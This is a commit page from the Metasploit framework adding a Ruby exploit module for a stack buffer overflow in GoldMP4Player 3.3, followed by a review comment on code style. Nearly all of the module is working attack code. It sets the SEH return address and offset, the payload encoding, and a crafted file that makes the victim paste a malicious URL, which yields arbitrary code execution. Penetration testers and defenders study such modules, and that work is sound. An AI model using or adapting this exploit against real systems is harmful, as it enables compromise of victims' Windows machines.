




Land #5008 into unstable

commit cae6931015c38536cd461c18f8cbfda91645de00 2 parents 48a1ff9 + cd7bf45
@jvazquez-r7 jvazquez-r7 authored
90 unstable-modules/exploits/unreliable/windows/fileformat/goldmp4player_url_bof.rb
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'GoldMP4Player URL Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability in
+ GoldMP4Player 3.3, caused by improper bounds checking of a URL.
+ By persuading the victim to copy the specially-crafted URL from the
+ resulting file and paste it into the Open Flash URL window, a remote
+ attacker could execute arbitrary code on the system or cause the
+ application to crash. This module has been tested successfully on
+ Windows XP SP3 and Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Gabor Seljan' # Vulnerability discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'BID', '65855' ],
+ [ 'EDB', '31914' ],
+ [ 'EDB', '31972' ],
+ [ 'OSVDB', '103826' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'process',
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => ((0..0xff).to_a - (0x21..0x7e).to_a).pack("C*"),
+ 'Space' => 6400,
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x59\x59\x59\x59\x5C\x61\x59\x59\x59\x59\x59\x41\x41\x41\x41",
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'ESP'
+ },
+ },
+ 'Targets' =>
+ [
+ [ 'Windows XP SP3 / Windows 7 SP1',
+ {
+ 'Offset' => 253,
+ 'Ret' => 0x10104544 # POP EBP # POP EBX # RETN [SkinPlusPlus.dll]
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Feb 27 2014',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt'])
+ ],
+ self.class)
+
+ end
+
+ def exploit
+
+ sploit = rand_text_alpha(target['Offset'])
+ sploit << "\x4b\x4b\x77\x21"
+ sploit << [target.ret].pack('V')
+ sploit << rand_text_alpha(29)
+ sploit << payload.encoded
+
+ # Create the file
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create("http://#{sploit}.swf")
+
+ end
+end
+
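Review bot: The body of `exploit` opens and closes with an empty line (right after `def exploit` and right before its `end`), and `initialize` has the same stray blank line between the `register_options(...)` call and its `end`; RuboCop's Layout/EmptyLinesAroundMethodBody flags this, so those lines should be dropped. `register_options` does not need the trailing `self.class` argument (the owner defaults to it), so `register_options([ OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']) ])` is the cleaner form, and the trailing comma after `'ExitFunction' => 'process',` can go. `Rank = NormalRanking` sits oddly next to the module's placement under `unreliable/` and the Description's note that the victim must copy the URL out of the file by hand; if NormalRanking is intentional, a one-line comment above `Rank` saying why would save the next reader from second-guessing it.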